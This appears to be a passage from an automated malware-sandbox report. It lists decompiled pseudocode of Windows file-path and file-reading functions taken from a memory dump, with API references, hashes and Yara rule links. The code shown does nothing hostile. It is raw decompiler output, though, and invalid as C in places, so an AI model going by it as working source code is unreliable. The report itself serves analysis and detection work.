                                                    0x011e2230
                                                    0x011e223b
                                                    0x011e2243
                                                    0x011e224e
                                                    0x011e2251
                                                    0x011e2257
                                                    0x011e225e
                                                    0x011e2261
                                                    0x011e226a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e226a
                                                    0x00000000
                                                    0x011e2217
                                                    0x00000000
                                                    0x011e22a6
                                                    0x011e2068
                                                    0x011e2071
                                                    0x011e2074
                                                    0x011e2291
                                                    0x00000000
                                                    0x011e2291
                                                    0x011e207a
                                                    0x011e2087
                                                    0x011e2095
                                                    0x00000000
                                                    0x011e2095

                                                    APIs
                                                    • memset.MSVCRT ref: 011E1FA3
                                                    • wcsspn.MSVCRT ref: 011E2181
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2278
                                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                    • String ID:
                                                    • API String ID: 1535828850-0
                                                    • Opcode ID: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                                    • Instruction ID: d3a4a764105d28c0265579dc273ab993552439345fa951b2646c1cd28c9dcc11
                                                    • Opcode Fuzzy Hash: 372b82de383cddab2aba8b4403b4f13fde9c7e4fe45ca5d48b4c4e74f269362f
                                                    • Instruction Fuzzy Hash: A1C19E75A00605CFDB29DFA8D898BA9B7F6BF54304F14819DD50A9B394DB309A82CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E3B5D, Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E011E3B5D(signed short* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				void* _v28;
				void _v548;
				WCHAR* _v552;
				signed int _v556;
				signed short* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				int _t46;
				signed int _t52;
				signed short* _t58;
				signed int _t59;
				intOrPtr _t63;
				signed short* _t65;
				void* _t77;
				signed short* _t78;
				void* _t79;
				signed short* _t84;
				signed short** _t87;
				signed int _t88;

				_t82 = __edx;
				_t31 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t31 ^ _t88;
				_v24 = 1;
				_t65 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t84 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L18:
					_t87 = 1;
				} else {
					0xffce = 0x24;
					_t87 = E011E00B0(0xffce);
					if(_t87 == 0) {
						L22:
						E011F9287(0xffce);
						__imp__longjmp(0x120b8b8, 1);
						goto L23;
					} else {
						 *_t87 = _t84;
						E011DC923(_t87);
						_t84 = _t87[3];
						_v560 = _t87[6];
						_v552 =  *_t87;
						_t63 = E011E00B0(0xffce);
						if(_t63 == 0) {
							goto L22;
						} else {
							 *0x1213cec = _t63;
							E011E36CB(0, _t63, 0x7fe7, 0);
							_t72 = _v28;
							if(_v28 == 0) {
								L23:
								_t72 =  &_v548;
							}
						}
					}
					_t82 = _v20;
					if(E011E2D22(_t72, _v20, _v552) != 0) {
						goto L18;
					} else {
						_t73 = _v28;
						if(_v28 == 0) {
							_t73 =  &_v548;
						}
						_t46 = 0x5c;
						_t82 = _t46;
						 *((short*)(E011E2349(_t73, _t46) + 2)) = 0;
						_t48 = _v28;
						if(_v28 == 0) {
							_t48 =  &_v548;
						}
						E011E0D89(_t82, _t48);
						if(_t84 == 0) {
							L20:
							E011DC923(_t87);
							_t87[6] = _v560;
						} else {
							_t52 =  *_t84 & 0x0000ffff;
							_t82 = 0x3a;
							if(_t52 == _t82) {
								goto L20;
							} else {
								_t77 = 0x5c;
								if(_t52 == _t77) {
									_t58 = _v552;
									if(_t84 == _t58) {
										L21:
										_t84 =  &(_t84[1]);
									} else {
										while( *_t58 != _t65) {
											_t78 = _t58;
											_t58 =  &(_t58[1]);
											if(_t58 != _t84) {
												continue;
											}
											L13:
											_t59 =  *_t78 & 0x0000ffff;
											if(_t59 == _t82) {
												goto L21;
											} else {
												_t79 = 0x5c;
												if(_t59 == _t79) {
													goto L21;
												}
											}
											goto L15;
										}
										_t78 = _t65;
										goto L13;
									}
								}
								L15:
								_v556 =  *_t84 & 0x0000ffff;
								 *_t84 = 0;
								if(GetFileAttributesW(_v552) == 0xffffffff) {
									_t65 = GetLastError();
								}
								 *0x1213cf0 = _t65;
								 *_t84 = _v556;
								if( *0x1213cf0 == 0) {
									goto L20;
								} else {
									goto L18;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t87, _t65, _v8 ^ _t88, _t82, _t84, _t87, _v28);
			}



























                                                    0x011e3b5d
                                                    0x011e3b68
                                                    0x011e3b6f
                                                    0x011e3b7a
                                                    0x011e3b7e
                                                    0x011e3b80
                                                    0x011e3b8a
                                                    0x011e3b8f
                                                    0x011e3b91
                                                    0x011e3bb7
                                                    0x011e3cf0
                                                    0x011e3cf2
                                                    0x011e3bbd
                                                    0x011e3bbf
                                                    0x011e3bc5
                                                    0x011e3bc9
                                                    0x011ee009
                                                    0x011ee009
                                                    0x011ee015
                                                    0x00000000
                                                    0x011e3bcf
                                                    0x011e3bd1
                                                    0x011e3bd3
                                                    0x011e3be0
                                                    0x011e3be3
                                                    0x011e3beb
                                                    0x011e3bf1
                                                    0x011e3bf8
                                                    0x00000000
                                                    0x011e3bfe
                                                    0x011e3c04
                                                    0x011e3c0b
                                                    0x011e3c10
                                                    0x011e3c15
                                                    0x011ee01b
                                                    0x011ee01b
                                                    0x011ee01b
                                                    0x011e3c15
                                                    0x011e3bf8
                                                    0x011e3c21
                                                    0x011e3c2b
                                                    0x00000000
                                                    0x011e3c31
                                                    0x011e3c31
                                                    0x011e3c36
                                                    0x011ee026
                                                    0x011ee026
                                                    0x011e3c3e
                                                    0x011e3c3f
                                                    0x011e3c48
                                                    0x011e3c4c
                                                    0x011e3c51
                                                    0x011ee031
                                                    0x011ee031
                                                    0x011e3c5d
                                                    0x011e3c64
                                                    0x011e3d10
                                                    0x011e3d12
                                                    0x011e3d1d
                                                    0x011e3c6a
                                                    0x011e3c6a
                                                    0x011e3c6f
                                                    0x011e3c73
                                                    0x00000000
                                                    0x011e3c79
                                                    0x011e3c7b
                                                    0x011e3c7f
                                                    0x011e3c81
                                                    0x011e3c89
                                                    0x011e3d22
                                                    0x011e3d22
                                                    0x011e3c8f
                                                    0x011e3c8f
                                                    0x011e3c98
                                                    0x011e3c9a
                                                    0x011e3c9f
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3ca1
                                                    0x011e3ca1
                                                    0x011e3ca7
                                                    0x00000000
                                                    0x011e3ca9
                                                    0x011e3cab
                                                    0x011e3caf
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3caf
                                                    0x00000000
                                                    0x011e3ca7
                                                    0x011ee03c
                                                    0x00000000
                                                    0x011ee03c
                                                    0x011e3c89
                                                    0x011e3cb1
                                                    0x011e3cba
                                                    0x011e3cc2
                                                    0x011e3cce
                                                    0x011e3cd6
                                                    0x011e3cd6
                                                    0x011e3cde
                                                    0x011e3ce4
                                                    0x011e3cee
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3cee
                                                    0x011e3c73
                                                    0x011e3c64
                                                    0x011e3c2b
                                                    0x011e3cf6
                                                    0x011e3d0f

                                                    APIs
                                                    • memset.MSVCRT ref: 011E3B91
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3CF6
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • longjmp.MSVCRT(0120B8B8,00000001,-00000001,00000000,?,00000000), ref: 011EE015
                                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9CF
                                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9E5
                                                      • Part of subcall function 011DC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                                      • Part of subcall function 011DC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 011E3CC5
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E3CD0
                                                      • Part of subcall function 011E2349: wcsrchr.MSVCRT ref: 011E234F
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                                    • String ID:
                                                    • API String ID: 3402406610-0
                                                    • Opcode ID: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                                    • Instruction ID: ae59b34ea5c5032b665c0d0424968dee3e3e5ff6580ad2d72d3ef3260354f571
                                                    • Opcode Fuzzy Hash: 5547aedaad0c5c857ebabfe46767c708a27ff67f6d3433009716d0b3b02945d9
                                                    • Instruction Fuzzy Hash: 9C51B331A006169BDB3CDBE9A84C67EBBF5FF58714F54046AE919D7280EB30C980CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DB710, Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E011DB710(intOrPtr _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1088;
				intOrPtr _v1092;
				void* _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t43;
				int _t46;
				char _t67;
				signed int _t85;

				_t41 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t41 ^ _t85;
				_t43 = _a4;
				_t84 = 0;
				_v1092 = _t43;
				_push(0);
				_push(0x120b8f8);
				L011E82C1();
				_t67 = 1;
				if(_t43 != 0) {
					 *0x120b8b0 = 1;
					L12:
					return E011E6FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
				}
				if( *0x1213ccc == 0) {
					if( *0x1218058 != 0) {
						goto L2;
					}
					_t46 = 1;
					if( *0x1213cc4 == 0) {
						L3:
						_v1088 = _t46;
						_v564 = _t84;
						_v560 = _t67;
						_v556 = 0x104;
						memset( &_v1084, _t84, 0x104);
						_v28 = _t84;
						_v24 = _t67;
						_v20 = 0x104;
						memset( &_v548, _t84, 0x104);
						_t84 = 0x7ee3;
						if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
							_t63 = _v28;
							if(_v28 == 0) {
								_t63 =  &_v548;
							}
							_t76 = _v564;
							if(_v564 == 0) {
								_t76 =  &_v1084;
							}
							_t79 =  &_v1088;
							_t67 = E011E5FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
							if(_t67 == 0) {
								if(_v28 == 0) {
									_t79 =  &_v548;
								}
								_t78 = _v564;
								if(_v564 == 0) {
									_t78 =  &_v1084;
								}
								_t67 = E011DB97C(_t78, _t79, _v1088, _v1100, _v1096);
							}
						}
						 *0x120b8b0 = _t67;
						__imp__??_V@YAXPAX@Z(_v28);
						__imp__??_V@YAXPAX@Z(_v564);
						goto L12;
					}
				}
				L2:
				_t46 = _t84;
				goto L3;
			}
























                                                    0x011db71b
                                                    0x011db722
                                                    0x011db725
                                                    0x011db72b
                                                    0x011db72d
                                                    0x011db733
                                                    0x011db734
                                                    0x011db739
                                                    0x011db741
                                                    0x011db745
                                                    0x011e9d59
                                                    0x011db877
                                                    0x011db889
                                                    0x011db889
                                                    0x011db751
                                                    0x011e9d6a
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9d70
                                                    0x011e9d78
                                                    0x011db759
                                                    0x011db75e
                                                    0x011db76b
                                                    0x011db773
                                                    0x011db779
                                                    0x011db77f
                                                    0x011db787
                                                    0x011db790
                                                    0x011db793
                                                    0x011db799
                                                    0x011db7a9
                                                    0x011db7c4
                                                    0x011db7e7
                                                    0x011db7ec
                                                    0x011e9d83
                                                    0x011e9d83
                                                    0x011db7f2
                                                    0x011db7fa
                                                    0x011e9d8e
                                                    0x011e9d8e
                                                    0x011db811
                                                    0x011db82a
                                                    0x011db82e
                                                    0x011db835
                                                    0x011db88c
                                                    0x011db88c
                                                    0x011db837
                                                    0x011db83f
                                                    0x011db894
                                                    0x011db894
                                                    0x011db858
                                                    0x011db858
                                                    0x011db82e
                                                    0x011db85d
                                                    0x011db863
                                                    0x011db870
                                                    0x00000000
                                                    0x011db876
                                                    0x011e9d7e
                                                    0x011db757
                                                    0x011db757
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$_setjmp3
                                                    • String ID:
                                                    • API String ID: 4215035025-0
                                                    • Opcode ID: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                                    • Instruction ID: 3f139567240e9f0b455cbc1c4d7c3ad1a7aa79a9b5a0e0ac35a533ea88d43fc1
                                                    • Opcode Fuzzy Hash: bb1d4160cea00cf6a6d98fe0fbc7ee8a2e6d03b16fb976b09212939062738f09
                                                    • Instruction Fuzzy Hash: 6A41B271E052299FDF29CAA5DC88AEEBBB4FB45304F0401ADE609A3140DB309A84CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F8F66, Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E011F8F66(void* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				void _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t55;
				int _t56;
				void* _t66;
				void* _t70;
				int _t71;
				signed int _t74;

				_t69 = __edx;
				_t31 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t31 ^ _t74;
				_v560 = 1;
				_t71 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t56 = __edx;
				_t70 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					__imp__??_V@YAXPAX@Z();
					return E011E6FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
				} else {
					_t64 = _v564;
					if(_v564 == 0) {
						_t64 =  &_v1084;
					}
					_t69 = _v556;
					if(E011E2D22(_t64, _v556, _t70) == 0) {
						_t65 = _v28;
						if(_v28 == 0) {
							_t65 =  &_v548;
						}
						_t69 = _v20;
						if(E011E2D22(_t65, _v20, _t56) == 0) {
							_t55 = _v28;
							if(_t55 == 0) {
								_t55 =  &_v548;
							}
							_t66 = _v564;
							if(_t66 == 0) {
								_t66 =  &_v1084;
							}
							__imp___wcsicmp(_t66, _t55);
							asm("sbb esi, esi");
							_t71 =  ~_t55 + 1;
						}
					}
					goto L13;
				}
			}






















                                                    0x011f8f66
                                                    0x011f8f71
                                                    0x011f8f78
                                                    0x011f8f83
                                                    0x011f8f8b
                                                    0x011f8f8d
                                                    0x011f8f99
                                                    0x011f8fa1
                                                    0x011f8fa3
                                                    0x011f8fa5
                                                    0x011f8fad
                                                    0x011f8fb5
                                                    0x011f8fb9
                                                    0x011f8fc5
                                                    0x011f8ff1
                                                    0x011f9082
                                                    0x011f9085
                                                    0x011f9092
                                                    0x011f90ab
                                                    0x011f901a
                                                    0x011f901a
                                                    0x011f9022
                                                    0x011f9024
                                                    0x011f9024
                                                    0x011f902a
                                                    0x011f9038
                                                    0x011f903a
                                                    0x011f903f
                                                    0x011f9041
                                                    0x011f9041
                                                    0x011f9047
                                                    0x011f9052
                                                    0x011f9054
                                                    0x011f9059
                                                    0x011f905b
                                                    0x011f905b
                                                    0x011f9061
                                                    0x011f9069
                                                    0x011f906b
                                                    0x011f906b
                                                    0x011f9073
                                                    0x011f907e
                                                    0x011f9081
                                                    0x011f9081
                                                    0x011f9052
                                                    0x00000000
                                                    0x011f9038

                                                    APIs
                                                    • memset.MSVCRT ref: 011F8FA5
                                                    • memset.MSVCRT ref: 011F8FC5
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • _wcsicmp.MSVCRT ref: 011F9073
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9085
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9092
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$_wcsicmp
                                                    • String ID:
                                                    • API String ID: 1670951261-0
                                                    • Opcode ID: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                                    • Instruction ID: 24969437e27e406e2c8bd999c452609998dcf48dbfd9787ffe554203ceaac5a3
                                                    • Opcode Fuzzy Hash: 8e93e8e5aa6be53fbf4aed118e250d3a6fcf944781d938ced00d4d3fb73568bf
                                                    • Instruction Fuzzy Hash: B7316B71A0021E57DF29DAA5DC58BEEBBB8EF54358F0401ADFA05D3141DB749E80CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F8E52, Relevance: 7.6, APIs: 5, Instructions: 103fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E011F8E52(intOrPtr __edx, long _a4, DWORD* _a8) {
				void _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void _t29;
				long _t38;
				void* _t39;
				signed int _t45;
				long _t46;
				void* _t52;
				void* _t54;
				intOrPtr _t57;
				void _t60;
				long _t61;

				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push(_t39);
				_push(_t39);
				_v12 = __edx;
				_t54 = 2;
				_t61 = E011D5DB5(_t39, _t54);
				if(_t61 == 0xffffffff) {
					_t52 = 0x6e;
					E011F985A(_t52);
					L2:
					E011F85E9(0, 1);
				}
				_t38 = _a4;
				while(1) {
					_t23 =  &_v8;
					__imp___get_osfhandle(0);
					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
						break;
					}
					_t57 = _v12;
					_t29 = _v8;
					_t60 = _t29;
					_t45 =  *(_t57 + 0x1c);
					if((_t45 & 0x0000c000) == 0) {
						if(_t60 <= 2) {
							L9:
							_t45 = _t45 | 0x00008000;
						} else {
							_t57 = _v12;
							if( *_t38 != 0xfeff) {
								goto L9;
							} else {
								_t45 = _t45 | 0x00004000;
							}
						}
						 *(_t57 + 0x1c) = _t45;
					}
					if(_t60 == 0) {
						_t46 = _v16;
					} else {
						asm("sbb ecx, ecx");
						_t46 = E011F6CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
						_t29 = _v8;
						_v16 = _t46;
					}
					if(_t29 == _a8) {
						continue;
					}
					if(_t46 == 0) {
						_t31 = _t29 - _t60;
						__imp___get_osfhandle(1);
						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
					}
					return _t61;
				}
				 *0x1213cf0 = GetLastError();
				E011DDB92(_t61);
				_push(0);
				_push( *0x1213cf0);
				E011DC5A2(_t61);
				goto L2;
			}


















                                                    0x011f8e5a
                                                    0x011f8e5e
                                                    0x011f8e65
                                                    0x011f8e66
                                                    0x011f8e69
                                                    0x011f8e6c
                                                    0x011f8e72
                                                    0x011f8e77
                                                    0x011f8e7b
                                                    0x011f8e7c
                                                    0x011f8e81
                                                    0x011f8e86
                                                    0x011f8e86
                                                    0x011f8e8b
                                                    0x011f8e8e
                                                    0x011f8e90
                                                    0x011f8e99
                                                    0x011f8ea9
                                                    0x00000000
                                                    0x00000000
                                                    0x011f8eaf
                                                    0x011f8eb2
                                                    0x011f8eb5
                                                    0x011f8eb7
                                                    0x011f8ec0
                                                    0x011f8ec5
                                                    0x011f8edc
                                                    0x011f8edc
                                                    0x011f8ec7
                                                    0x011f8ecf
                                                    0x011f8ed2
                                                    0x00000000
                                                    0x011f8ed4
                                                    0x011f8ed4
                                                    0x011f8ed4
                                                    0x011f8ed2
                                                    0x011f8ee2
                                                    0x011f8ee2
                                                    0x011f8ee7
                                                    0x011f8f10
                                                    0x011f8ee9
                                                    0x011f8efe
                                                    0x011f8f06
                                                    0x011f8f08
                                                    0x011f8f0b
                                                    0x011f8f0b
                                                    0x011f8f16
                                                    0x00000000
                                                    0x00000000
                                                    0x011f8f1e
                                                    0x011f8f23
                                                    0x011f8f27
                                                    0x011f8f2f
                                                    0x011f8f2f
                                                    0x011f8f3d
                                                    0x011f8f3d
                                                    0x011f8f48
                                                    0x011f8f4d
                                                    0x011f8f52
                                                    0x011f8f54
                                                    0x011f8f5a
                                                    0x00000000

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011F8E99
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F8EA1
                                                    • _get_osfhandle.MSVCRT ref: 011F8F27
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 011F8F2F
                                                      • Part of subcall function 011F85E9: longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86B6
                                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86E4
                                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F8712
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F8F40
                                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                    • String ID:
                                                    • API String ID: 288106245-0
                                                    • Opcode ID: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                                    • Instruction ID: 23731189a15aac567ff3350d6f0802bc93be1c5c9a511d952ba88e2b1329f2a5
                                                    • Opcode Fuzzy Hash: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                                    • Instruction Fuzzy Hash: 0C31D171E10219AFEF2CDF69D859BAE77AAEB94324F10812EE601C72C5DF7099408B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D5712, Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E011D5712(void* __ecx, long __edx, DWORD* _a4, struct _OVERLAPPED* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v8;
				intOrPtr _v16;
				void* _t19;
				signed int _t26;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				signed int _t43;
				intOrPtr _t52;
				void* _t54;
				struct _OVERLAPPED* _t55;
				void* _t58;
				void* _t59;

				_t55 = _a8;
				_t33 = __edx;
				_v8 = 0;
				_t59 = __ecx;
				 *0x11fd5cc = 0;
				__imp___get_osfhandle(0, _t54, _t58, _t32, __ecx, __ecx);
				if(ReadFile(0, __ecx, __edx, _a4, _t55) == 0) {
					L18:
					 *0x1213cf0 = GetLastError();
					_t19 = E011E0178(E011DDB92(_t59));
					E011DDB92(_a16);
					if(_t19 == 0) {
						DeleteFileW(_a20);
					}
					E011F85E9( *0x1213cf0, 1);
					asm("int3");
					E011E1040(_v8, _t55, _v16);
					return 0;
				} else {
					_t43 = _t55->Internal;
					if(_t43 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L18;
						} else {
							_t43 = _t55->Internal;
							if(_t43 != 0) {
								goto L2;
							} else {
								 *0x1213cf0 =  *0x1213cf0 & _t43;
								_t31 = 0;
							}
							goto L5;
						}
					} else {
						L2:
						_t52 = _a12;
						_t26 =  *(_t52 + 0x1c);
						if((_t26 & 0x0000c000) == 0) {
							if(_t43 < 2 ||  *_t33 != 0xfeff) {
								_t26 = _t26 | 0x00008000;
							} else {
								_t26 = _t26 | 0x00004000;
							}
							 *(_t52 + 0x1c) = _t26;
						}
						if((_t26 & 0x00008002) == 0x8002) {
							E011F6CEF(1, _t33, _t55,  &_v8);
							if(_t55->Internal != _t55->Internal) {
								 *0x11fd5cc = 1;
							}
						}
						_t31 = 1;
						L5:
						return _t31;
					}
				}
			}
















                                                    0x011d571c
                                                    0x011d5726
                                                    0x011d5728
                                                    0x011d572b
                                                    0x011d572d
                                                    0x011d5734
                                                    0x011d5744
                                                    0x011e974a
                                                    0x011e9752
                                                    0x011e975f
                                                    0x011e9769
                                                    0x011e9770
                                                    0x011e9775
                                                    0x011e9775
                                                    0x011e9784
                                                    0x011e9789
                                                    0x011e9792
                                                    0x011d583e
                                                    0x011d574a
                                                    0x011d574a
                                                    0x011d574e
                                                    0x011e9709
                                                    0x00000000
                                                    0x011e970b
                                                    0x011e970b
                                                    0x011e970f
                                                    0x00000000
                                                    0x011e9715
                                                    0x011e9715
